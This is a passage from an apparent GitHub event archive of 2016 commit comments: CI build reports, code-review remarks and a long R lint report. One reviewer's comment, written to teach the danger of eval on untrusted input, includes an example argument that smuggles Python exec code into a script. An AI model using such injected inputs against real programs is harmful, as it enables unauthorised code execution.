SIL.Tests.IO.FileLock.SimpleFileLockTests.TryAcquireLock_LockedByActiveProcessTimedOut_ReturnsTrue: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-21T17:43:10Z"}
{"id":"4597814527","type":"CommitCommentEvent","actor":{"login":"jakubknejzlik"},"repo":{"name":"thefuntasty/LocationManager"},"payload":{"comment":{"id":19117653,"position":null,"line":null,"path":null,"commit_id":"a0878798e1232d437b80bb9d06ecb17226d9ebc0","created_at":"2016-09-21T17:43:27Z","updated_at":"2016-09-21T17:43:27Z","body":"👍 "}},"created_at":"2016-09-21T17:43:27Z"}
{"id":"4597817939","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":19117661,"position":null,"line":null,"path":null,"commit_id":"515b583dc945fad4d0f39bba01f7d2f36c7885cc","created_at":"2016-09-21T17:44:03Z","updated_at":"2016-09-21T17:44:03Z","body":"TeamCity libpalaso :: palaso-precise64-libpalaso-2.6 Continuous [Build 2.6.1101.515b583dc945fad4d0f39bba01f7d2f36c7885cc](http://build.palaso.org/viewLog.html?buildId=77018&buildTypeId=PalasoPrecise64v26Cont) outcome was **SUCCESS**\nSummary: Tests passed: 3470, ignored: 107 Build time: 00:06:38"}},"created_at":"2016-09-21T17:44:03Z"}
{"id":"4597819404","type":"CommitCommentEvent","actor":{"login":"christian-fei"},"repo":{"name":"christian-fei/dotfiles"},"payload":{"comment":{"id":19117669,"position":null,"line":null,"path":null,"commit_id":"bd4ae715abc4835fa2b8b08941b87103b60e9b85","created_at":"2016-09-21T17:44:19Z","updated_at":"2016-09-21T17:44:19Z","body":"grazie @AlessioCoser "}},"created_at":"2016-09-21T17:44:19Z"}
{"id":"4597821334","type":"CommitCommentEvent","actor":{"login":"einwoko96"},"repo":{"name":"einwoko96/EE460N"},"payload":{"comment":{"id":19117672,"position":null,"line":null,"path":null,"commit_id":"4f91d8ce95adb9a8cad103c4a610b6f644dea27c","created_at":"2016-09-21T17:44:41Z","updated_at":"2016-09-21T17:44:41Z","body":"none"}},"created_at":"2016-09-21T17:44:41Z"}
{"id":"4597826605","type":"CommitCommentEvent","actor":{"login":"the-kenny"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19117679,"position":null,"line":null,"path":null,"commit_id":"01e44ac1f9af1d42ee9b5000426b780f2a03c948","created_at":"2016-09-21T17:45:37Z","updated_at":"2016-09-21T17:45:37Z","body":"I'm sorry that this update caused problems on your side. Unfortunately there aren't any tests guarding against this (and my manual checks for a few modes worked just fine, I just didn't check `haskell-mode` more than opening a file etc.).\r\n\r\nAs a quick-fix you can install your emacs from a git clone of nixpkgs prior this commit (or with this commit reverted). \r\n\r\nIs this an issue with our packaging of `emacs25` or is this an upstream issue of `haskell-mode`? \r\n\r\nWe could bring back `emacs24` for the time being, but I fear that this will ultimately lead to nixpkgs supporting every past software release ever. *If* we bring it back, then please as a non-default and without duplicating all the `emacs25Packages` stuff in `all-packages.nix`. Just add `pkgs.emacs24` and let users use `packageOverrides` for it. "}},"created_at":"2016-09-21T17:45:37Z"}
{"id":"4597826771","type":"CommitCommentEvent","actor":{"login":"NeatSketch"},"repo":{"name":"NeatSketch/tabun"},"payload":{"comment":{"id":19117681,"position":null,"line":null,"path":null,"commit_id":"eec5763ea1a9fea84e748e4f793bad1786c56205","created_at":"2016-09-21T17:45:40Z","updated_at":"2016-09-21T17:45:40Z","body":"Пояснения и замечания:\r\n- Для управления правами в блоге теперь вместо ролей существуют 4 категории разрешений: блог, голоса, топики, комментарии. Каждая из категорий, в свою очередь, состоит из 4 разрешений: CREATE, READ, UPDATE, DELETE. Это означает, что можно разрешать или запрещать, например, оставлять комментарии в блоге.\r\n- На комментарии данная система ещё не действует, поскольку не решён вопрос с редактированием.\r\n- Право голоса относится ко всему в блоге: к самому блогу, к его топикам и к комментариям в них.\r\n- Нельзя отобрать право голоса в блоге, если он открытый (потому что пользователь может голосовать даже не состоя в таком блоге).\r\n- Для голосов редактируемым следует оставить только разрешение CREATE, а для других разрешений на голоса следует не добавлять никакого интерфейса.\r\n- Для управления вышеперечисленными правами нужно ещё изготовить UI. Прежний UI для управления ролями всё ещё работает (система обратно совместима со старыми ролями)."}},"created_at":"2016-09-21T17:45:40Z"}
{"id":"4597829161","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19117688,"position":null,"line":null,"path":null,"commit_id":"c68b4297923893da10611ee856944ed40ffe3373","created_at":"2016-09-21T17:46:08Z","updated_at":"2016-09-21T17:46:08Z","body":"develop (nmerket) - x86_64-MacOS-10.9-clang: OK (1764 of 1764 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c68b4297923893da10611ee856944ed40ffe3373-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c68b4297923893da10611ee856944ed40ffe3373-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-21T17:46:08Z"}
{"id":"4597829826","type":"CommitCommentEvent","actor":{"login":"manjumanikumar"},"repo":{"name":"manjumanikumar/Python-Codes"},"payload":{"comment":{"id":19117689,"position":null,"line":null,"path":null,"commit_id":"35441b6dde0100969f5c8bf567169a790f8f635d","created_at":"2016-09-21T17:46:13Z","updated_at":"2016-09-21T17:46:13Z","body":"Commit with a little modification"}},"created_at":"2016-09-21T17:46:13Z"}
{"id":"4597830132","type":"CommitCommentEvent","actor":{"login":"vilmes21"},"repo":{"name":"CodeCoreYVR/indie_arcade"},"payload":{"comment":{"id":19117691,"position":null,"line":null,"path":null,"commit_id":"53a3eadeb0f5ad52f0a34b9884f760b09b18162d","created_at":"2016-09-21T17:46:17Z","updated_at":"2016-09-21T17:46:17Z","body":"Reviewed with Vic. Works on computer."}},"created_at":"2016-09-21T17:46:17Z"}
{"id":"4597830744","type":"CommitCommentEvent","actor":{"login":"sambvfx"},"repo":{"name":"ifitzpatrick/rill"},"payload":{"comment":{"id":19117692,"position":null,"line":null,"path":null,"commit_id":"a4f613a059c8f5612822483f9b7734a29dd34617","created_at":"2016-09-21T17:46:24Z","updated_at":"2016-09-21T17:46:24Z","body":"Note that this breaks `deserialize` which will need to be addressed at some point..."}},"created_at":"2016-09-21T17:46:24Z"}
{"id":"4597831008","type":"CommitCommentEvent","actor":{"login":"quant1729"},"repo":{"name":"QuantConnect/Lean"},"payload":{"comment":{"id":19117693,"position":34,"line":172,"path":"Common/Data/Market/OptionContract.cs","commit_id":"b3590647b50d2103b1eb110740cccdb87218eb90","created_at":"2016-09-21T17:46:27Z","updated_at":"2016-09-21T17:46:27Z","body":"Yes, sorry. Fixed."}},"created_at":"2016-09-21T17:46:27Z"}
{"id":"4597845444","type":"CommitCommentEvent","actor":{"login":"taiar"},"repo":{"name":"dballona/actionmessage"},"payload":{"comment":{"id":19117725,"position":4,"line":42,"path":"README.md","commit_id":"5d2043ef2143bcf386b1eed2f9c8ab976a547cd2","created_at":"2016-09-21T17:49:01Z","updated_at":"2016-09-21T17:49:01Z","body":":clap: :clap: :clap: "}},"created_at":"2016-09-21T17:49:01Z"}
{"id":"4597845882","type":"CommitCommentEvent","actor":{"login":"DarkTan"},"repo":{"name":"TheSoftwareFactory/experiment-server"},"payload":{"comment":{"id":19117728,"position":42,"line":42,"path":"experiment_server/views/configurationkeys.py","commit_id":"f385370c5abc095fee8b93829ed699385b7ba578","created_at":"2016-09-21T17:49:06Z","updated_at":"2016-09-21T17:49:06Z","body":"`print_log(name, 'POST', '/configurationkeys', 'Create new configurationkey', result)` should be\r\n`print_log(name, 'POST', '/applications/{id}/configurationkeys', 'Create new configurationkey', result)`. \r\nor \r\n`print_log(name, 'POST', '/applications/'+str(id)+'/configurationkeys', 'Create new configurationkey', result)`"}},"created_at":"2016-09-21T17:49:06Z"}
{"id":"4597845975","type":"CommitCommentEvent","actor":{"login":"CheckYourScreen"},"repo":{"name":"NachiketNamjoshi/BlackReactor_onyx"},"payload":{"comment":{"id":19117729,"position":null,"line":null,"path":null,"commit_id":"3bfeb8ff50043e7164a5033ef083958a6be56c03","created_at":"2016-09-21T17:49:07Z","updated_at":"2016-09-21T17:49:07Z","body":"Going back to stone age?\r\nAtleast use Os man :/\r\nOfast sucks!"}},"created_at":"2016-09-21T17:49:07Z"}
{"id":"4597850243","type":"CommitCommentEvent","actor":{"login":"dgldaniel"},"repo":{"name":"LuizRicardoRipardo/ProgWebClienteUEMA"},"payload":{"comment":{"id":19117732,"position":null,"line":null,"path":null,"commit_id":"5372a9896e21bdae9796bce9137e25e2e364ce80","created_at":"2016-09-21T17:49:51Z","updated_at":"2016-09-21T17:49:51Z","body":"Excluindo umas imagens que coloquei a mais."}},"created_at":"2016-09-21T17:49:51Z"}
{"id":"4597851803","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":19117736,"position":null,"line":null,"path":null,"commit_id":"515b583dc945fad4d0f39bba01f7d2f36c7885cc","created_at":"2016-09-21T17:50:07Z","updated_at":"2016-09-21T17:50:07Z","body":"TeamCity libpalaso :: palaso-precise64-master Continuous [Build 3.0.770.515b583dc945fad4d0f39bba01f7d2f36c7885cc](http://build.palaso.org/viewLog.html?buildId=77020&buildTypeId=bt322) outcome was **SUCCESS**\nSummary: Tests passed: 3470, ignored: 107 Build time: 00:05:58"}},"created_at":"2016-09-21T17:50:07Z"}
{"id":"4597860494","type":"CommitCommentEvent","actor":{"login":"Serg-Norseman"},"repo":{"name":"Serg-Norseman/GEDKeeper"},"payload":{"comment":{"id":19117756,"position":null,"line":null,"path":null,"commit_id":"49999c960cedd86bccc5ea8740d8a6e829d3f6f4","created_at":"2016-09-21T17:51:38Z","updated_at":"2016-09-21T17:51:38Z","body":"Great review! :+1: "}},"created_at":"2016-09-21T17:51:38Z"}
{"id":"4597869072","type":"CommitCommentEvent","actor":{"login":"bcostlow"},"repo":{"name":"cohpy/challenge-201608-refactor"},"payload":{"comment":{"id":19117781,"position":null,"line":null,"path":null,"commit_id":"8c242cf8dadeb494061419be1adf69d581b3db5f","created_at":"2016-09-21T17:53:08Z","updated_at":"2016-09-21T17:53:08Z","body":"Hey Jim,\r\n\r\nIf you show this, mention the dangers of eval on untrusted imports to newbies. Doesn't matter much here, if a user already has command line to execute circle2, they can do bad things directly. But imagine if this were a web app...\r\n\r\nAnd though eval won't execute an import, exec will, and eval will run exec. Consider:\r\n\r\ncircle2.py 0 0 \"exec('import os; print(os.listdir())')\"\r\n\r\nThis crashes the script, but not until after the os.listdir has run. Substitute evil of your choice. :-)"}},"created_at":"2016-09-21T17:53:08Z"}
{"id":"4597869124","type":"CommitCommentEvent","actor":{"login":"knocte"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":19117782,"position":null,"line":null,"path":null,"commit_id":"99f2a62240cef1c950975f35b2e1fa896123abb4","created_at":"2016-09-21T17:53:09Z","updated_at":"2016-09-21T17:53:09Z","body":"I think it's better if you use the comment \"On windows the path /foo is parsed as BadFormat and checking\r\n if this is relative or absolute doesn't make sense.\" as a string that you pass to Assert.Ignore() method."}},"created_at":"2016-09-21T17:53:09Z"}
{"id":"4597869621","type":"CommitCommentEvent","actor":{"login":"hantescu"},"repo":{"name":"hantescu/ColorGame"},"payload":{"comment":{"id":19117784,"position":null,"line":null,"path":null,"commit_id":"eb85c6fa789666222807c6df9f5a8af32297f837","created_at":"2016-09-21T17:53:14Z","updated_at":"2016-09-21T17:53:14Z","body":"colors.js a disparut pentru ca am dat eu un revert aiurea :)) am schimbat cateva chestii de acolo doar ca sa imi readuc aminte de cateva chestii invatate mai demult, o sa revin la cerintele initiale\r\n"}},"created_at":"2016-09-21T17:53:14Z"}
{"id":"4597871755","type":"CommitCommentEvent","actor":{"login":"jgudhlanga"},"repo":{"name":"jgudhlanga/excellence"},"payload":{"comment":{"id":19117793,"position":1,"line":1,"path":"README.md","commit_id":"bf7adc4a74bde02f1b4b12da2aa1cfa5ae16b068","created_at":"2016-09-21T17:53:38Z","updated_at":"2016-09-21T17:53:38Z","body":"This project is composed of two modules \r\n1. chms which  mimics a church manager, (membership directories and profiles, cell groups, zones and church ministries management, etc)\r\n2. HMS is a hostel manager where guests or students can book in and all transaction will be held online and reports can be generated anytime by the administrators of the system"}},"created_at":"2016-09-21T17:53:38Z"}
{"id":"4597873284","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19117797,"position":null,"line":null,"path":null,"commit_id":"6ac19ea356df9fa833c65a19322ea952816ecb6f","created_at":"2016-09-21T17:53:54Z","updated_at":"2016-09-21T17:53:54Z","body":"EMS (brianlball) - i386-Windows-7-VisualStudio-12: Tests Failed (2202 of 2480 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6ac19ea356df9fa833c65a19322ea952816ecb6f-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6ac19ea356df9fa833c65a19322ea952816ecb6f-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-88.79%25-red.svg)</a> \n"}},"created_at":"2016-09-21T17:53:54Z"}
{"id":"4597880148","type":"CommitCommentEvent","actor":{"login":"damon-atkins"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19117813,"position":null,"line":null,"path":null,"commit_id":"f237fe4d528efd621e1f9adbeb149695e94e65a1","created_at":"2016-09-21T17:55:13Z","updated_at":"2016-09-21T17:55:13Z","body":"Re: get_repo_data\r\n\r\nThis needs to be restored\r\n```\r\n# we only call refresh_db if it does not exist, as we want to return\r\n# the existing data even if its old, other parts of the code call this,\r\n# and  they will call refresh if they need too.\r\nif repo_age_sec == -1:\r\n    # no repo meta db\r\n    log.debug('No metadata repo cache file. Refresh meatadata db now.')\r\n    _refresh_db_conditional(saltenv=saltenv)\r\n```\r\nAnd always run  `_refresh_db_conditional(saltenv=saltenv)` needs to be removed\r\n\r\nIt would also result in _refresh_db_conditional being called multiple times.   The only reason _refresh_db_conditional is called is to create the metadata db if it does not exist, as it was a recent policy change to create it instead of giving an error back to the use.\r\n\r\nAnd if you run an install and want to find out why it did not work by looking what is defined on the remote server, you want to see the existing metadata db not the data  that as just been updated."}},"created_at":"2016-09-21T17:55:13Z"}
{"id":"4597882044","type":"CommitCommentEvent","actor":{"login":"gwvo"},"repo":{"name":"adsharma/flatbuffers"},"payload":{"comment":{"id":19117821,"position":6,"line":56,"path":"include/flatbuffers/idl.h","commit_id":"51f46e430b39fe9a0cc0817918e2cb3b5e72b8d7","created_at":"2016-09-21T17:55:33Z","updated_at":"2016-09-21T17:55:33Z","body":"If we add new types to FlatBuffers, other languages need to at least not blow up if they come across them. In theory, we should then eventually support whatever functionality you're trying to add to these other languages too.\r\n\r\nLike I've said before, this is very special purpose functionality, and I would not want to modify the core of FlatBuffers for it in a significant way. It be better if this can be done externally to FlatBuffers."}},"created_at":"2016-09-21T17:55:33Z"}
{"id":"4597884916","type":"CommitCommentEvent","actor":{"login":"NicolasThebaud"},"repo":{"name":"NicolasThebaud/leafDB"},"payload":{"comment":{"id":19117830,"position":null,"line":null,"path":null,"commit_id":"9f8cec96e2852edddc5dbe3bed0ae1f062555011","created_at":"2016-09-21T17:56:04Z","updated_at":"2016-09-21T17:56:04Z","body":"Code was also cleaned of dead code"}},"created_at":"2016-09-21T17:56:04Z"}
{"id":"4597887026","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19117839,"position":null,"line":null,"path":null,"commit_id":"eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5","created_at":"2016-09-21T17:56:25Z","updated_at":"2016-09-21T17:56:25Z","body":"[R/ABC_SMC.R:3:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L3) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L16) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L23) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:26:68:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L26) *style:* **Commas should always have a space after.**\n```r\n​  diff <- params[target] - cbind(disp_vals, filt_vals, comp_vals)[,target]\n                                                                   ^\n```\n[R/ABC_SMC.R:27:54:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L27) *style:* **Trailing whitespace is superfluous.**\n```r\n​  vals <- weights * dnorm(diff, mean = 0, sd = sigma)  \n                                                     ^~\n```\n[R/ABC_SMC.R:28:12:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​  return( 1/sum(vals) )\n          ~^~\n```\n[R/ABC_SMC.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L32) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L66) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:70:40:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2\n                                      ~^~\n```\n[R/ABC_SMC.R:78:21:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L78) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:80:46:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L80) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, \n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:80:60:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L80) *style:* **Trailing whitespace is superfluous.**\n```r\n​                    abundances, frequencies, stopRate, Ord, \n                                                           ^\n```\n[R/ABC_SMC.R:86:52:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L86) *style:* **Trailing whitespace is superfluous.**\n```r\n​           \"one of the community summary statistics \n                                                   ^\n```\n[R/ABC_SMC.R:90:10:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:90:10:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L90) *warning:* **no visible global function definition for ‘detMnbsp’**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:93:18:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L93) *style:* **Variable and function names should be all lowercase.**\n```r\n​  disp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:94:18:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L94) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filt_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:95:18:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  comp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:13:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:17:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rich_vec <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:99:16:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  eve_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:100:16:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  div_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:101:16:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  opt_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:107:21:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L107) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:108:26:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L108) *style:* **Variable and function names should be all lowercase.**\n```r\n​  next_weights <- rep(1, numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:109:16:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L109) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:121:7:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L121) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n      ^\n```\n[R/ABC_SMC.R:121:10:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L121) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:121:23:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L121) *style:* **Commas should always have a space after.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                      ^\n```\n[R/ABC_SMC.R:121:29:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L121) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:143:5:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L143) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:144:28:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L144) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:144:28:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L144) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:12:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:30:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n                             ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L156) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L156) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:158:19:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L158) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:160:19:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L160) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:170:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L170) *style:* **Trailing whitespace is superfluous.**\n```r\n​     \n^~~~~\n```\n[R/ABC_SMC.R:174:40:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L174) *style:* **Commas should always have a space after.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],\n                                       ^\n```\n[R/ABC_SMC.R:174:53:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L174) *style:* **Put spaces around all infix operators.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],\n                                                   ~^~\n```\n[R/ABC_SMC.R:175:40:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L175) *style:* **Put spaces around all infix operators.**\n```r\n​                              row.names=c(1:taxa))\n                                      ~^~\n```\n[R/ABC_SMC.R:179:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L179) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:180:20:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- 